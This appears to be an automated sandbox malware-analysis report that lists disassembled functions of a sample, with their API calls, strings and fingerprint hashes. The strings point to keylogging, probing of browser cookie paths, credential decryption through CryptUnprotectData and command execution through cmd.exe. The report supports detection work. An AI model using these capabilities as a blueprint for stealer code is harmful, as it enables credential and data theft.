Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757

Strings

User Data\Profile ?\Network\Cookies, xrefs: 0040C704
User Data\Default\Network\Cookies, xrefs: 0040C6D2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 46a1b36afa4c49027702cc907afc44a8fe86254807fad0107447329d58fb7210
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: 46a1b36afa4c49027702cc907afc44a8fe86254807fad0107447329d58fb7210
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Function 0213B3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0213B3D9
wsprintfW.USER32 ref: 0213B45A

Part of subcall function 0213A89D: SetEvent.KERNEL32(00000000,?,00000000,0213B471,00000000), ref: 0213A8C9

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0213B3E2
Offline Keylogger Started, xrefs: 0213B3D2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
API String ID: 1497725170-184404310
Opcode ID: 1078eac15a60e496e4107be0a264594a237c933df15ca94f59553829ddb9cd8e
Instruction ID: 95610b1962334c0837bf332508d01b982a235d1389efef0c9eaa4568766a02c3
Opcode Fuzzy Hash: 1078eac15a60e496e4107be0a264594a237c933df15ca94f59553829ddb9cd8e
Instruction Fuzzy Hash: CB113372544118AECB1AFB94ED54CFF77BEAE48311B00016EF906A6190EF749F45CAE8

Function 0213508D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 021350AA
CloseHandle.KERNEL32(00000000), ref: 021350B3
closesocket.WS2_32(FFFFFFFF), ref: 021350C1

Strings

PkGNG, xrefs: 0213508F

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseEventHandleclosesocket
String ID: PkGNG
API String ID: 803913606-263838557
Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction ID: 3ae1beb3f1125d2c5f51e75ac5f4ee0952e7c2cd71bedbedd4b4627dfb68f239
Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction Fuzzy Hash: 55212931044B00EFDB326B21DC49B26BBA3FF44726F104A69E1E611AF1CB72E811DB58

Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

| , xrefs: 0041B53C
%02i:%02i:%02i:%03i , xrefs: 0041B51E
PkGNG, xrefs: 0041B4EF

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i $PkGNG
API String ID: 481472006-3277280411
Opcode ID: 53ca617f8275cad4764fe0af5f0b09d929ee2b8573dc48eaf7c205eada395b41
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: 53ca617f8275cad4764fe0af5f0b09d929ee2b8573dc48eaf7c205eada395b41
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Function 021351B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 021351E8
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02135234
CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 02135247

Strings

KeepAlive | Enabled | Timeout: , xrefs: 021351FB

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
Instruction ID: 79d7e5c409c075d1d3143f718ad01a9470fc47982fc5e0e1d187ac60d1230e89
Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
Instruction Fuzzy Hash: 7C11E031844280BBC721B7669C0CFABBFBAABCAB14F44045EE84252150DBB49445CBA6

Function 02137764 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02137788
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 021377E9

Strings

{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 0213777D, 02137782, 021377C1
$, xrefs: 021377A2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-2784132835
Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction ID: 88ec1c4799bbee295695d9ffce53b015925b12618e96b8c4e78c8ac441659f74
Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction Fuzzy Hash: 761186B1980218BAC711E794D949EEEF7BD9B04720F11006AE805A3280E7799A45CEA6

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

crypt32, xrefs: 00406A7D
CryptUnprotectData, xrefs: 00406A78

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Function 0217C4BA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0217C569,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0217C4F3
GetLastError.KERNEL32 ref: 0217C4FD
__dosmaperr.LIBCMT ref: 0217C504

Strings

PkGNG, xrefs: 0217C4BC

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: PkGNG
API String ID: 2336955059-263838557
Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction ID: 3e45ea9c7850492310add841f8bd2458a8b38d560a93e90e942764ad293f49d7
Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction Fuzzy Hash: 9401DD32650518AFCB159F65DC048AE7B3ADBC5320B250259F915D7190EB71DD518BD0

Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
GetLastError.KERNEL32 ref: 0044C296
__dosmaperr.LIBCMT ref: 0044C29D

Strings

PkGNG, xrefs: 0044C255

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: PkGNG
API String ID: 2336955059-263838557
Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::badbit set, xrefs: 0040E7EF
ios_base::failbit set, xrefs: 0040E815
ios_base::eofbit set, xrefs: 0040E822

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
LocalFree.KERNEL32(?,?), ref: 0041CB2F

Strings

@J@, xrefs: 0041CAED
PkGNG, xrefs: 0041CAE1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: @J@$PkGNG
API String ID: 1427518018-1416487119
Opcode ID: 0ad2ea3ebaa2d541cf674e660916fbf62cd0c30cd718145f4c15d7088bf7ea2c
Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
Opcode Fuzzy Hash: 0ad2ea3ebaa2d541cf674e660916fbf62cd0c30cd718145f4c15d7088bf7ea2c
Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659

Function 02143A7B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 02143A86
RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0213FA8A,pth_unenc,004752D8), ref: 02143AB4
RegCloseKey.ADVAPI32(004752D8,?,0213FA8A,pth_unenc,004752D8), ref: 02143ABF

Strings

pth_unenc, xrefs: 02143A7F

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction ID: 547dfe1e124075221e95534ea917264a20f1c1b3a31db2edba9ea00fc63bbc17
Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction Fuzzy Hash: ADF04971580218BBDF10ABA0ED45EEE376DEB44B51F104565BD0A961A0EB319E04DA90

Function 021735A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,0045D3AC,00000000,?,?,PkGNG,02173552,00000003,PkGNG,021734F2,00000003,0046E948,0000000C,02173649,00000003,00000002), ref: 021735C1
GetProcAddress.KERNEL32(00000000,0045D3C4), ref: 021735D4
FreeLibrary.KERNEL32(00000000,?,?,PkGNG,02173552,00000003,PkGNG,021734F2,00000003,0046E948,0000000C,02173649,00000003,00000002,00000000,PkGNG), ref: 021735F7

Strings

PkGNG, xrefs: 021735A3

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: PkGNG
API String ID: 4061214504-263838557
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: a48b1e32bf4ad867ad2a5e190fd633d1db794e5db7be4ae011b698400d2079c2
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 75F0C831A40209FFCF119F94DC09B9DBFB5EF44706F4040A9FC05A2161CB309E40DA94

Function 021439D6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 021439E5
RegSetValueExA.ADVAPI32(0046611C,0046CBB8,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0214CD18,0046CBB8,0046611C,00000001,00474EE0,00000000), ref: 02143A0D
RegCloseKey.ADVAPI32(0046611C,?,?,0214CD18,0046CBB8,0046611C,00000001,00474EE0,00000000,?,021389C4,00000001), ref: 02143A18

Strings

Control Panel\Desktop, xrefs: 021439DF, 021439EF

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction ID: d6a7ba46829ff42ed9fd89eb47be8f9dc5850f45fe7a4180455cee31b34ccb98
Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction Fuzzy Hash: 44F09072480228FFDF01AFA0ED04EEA376DEF04751F204665FD19A6161EB319E14DB90

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 00413778, 00413788

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 6ec9d5cc05c4fd0a45aeda0589bc8e38c54cebbaa7c3afdc401e7c46dfc48e34
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 6ec9d5cc05c4fd0a45aeda0589bc8e38c54cebbaa7c3afdc401e7c46dfc48e34
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Function 02146E94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0041D45D,00000000,00000000,00000000), ref: 02146EAE
ShowWindow.USER32(00000009), ref: 02146EC8
SetForegroundWindow.USER32 ref: 02146ED4

Part of subcall function 0214D002: AllocConsole.KERNEL32 ref: 0214D00B
Part of subcall function 0214D002: GetConsoleWindow.KERNEL32 ref: 0214D011
Part of subcall function 0214D002: ShowWindow.USER32(00000000,00000000), ref: 0214D024
Part of subcall function 0214D002: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0214D049

Strings

!D@, xrefs: 021472F0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Window$Console$Show$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 186401046-604454484
Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
Instruction ID: 8e66d9aaed28245d9f318fbb261dc81e5db1b54845491a01d5b7c03f980f3cee
Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
Instruction Fuzzy Hash: CFF05EB0184240EED225AB20EC19EBA775AEB50301F004835FE09C20A1DF319C4ADA59

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Window$Console$Show$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 186401046-604454484
Opcode ID: 422ba51f9f84ae340aa908cb1fa484a517e58e9a835c05c53a85efb8179dd998
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: 422ba51f9f84ae340aa908cb1fa484a517e58e9a835c05c53a85efb8179dd998
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

open, xrefs: 0041612A
cmd.exe, xrefs: 00416125
/C , xrefs: 0041610E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

User32.dll, xrefs: 0040140F
GetCursorInfo, xrefs: 0040140A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
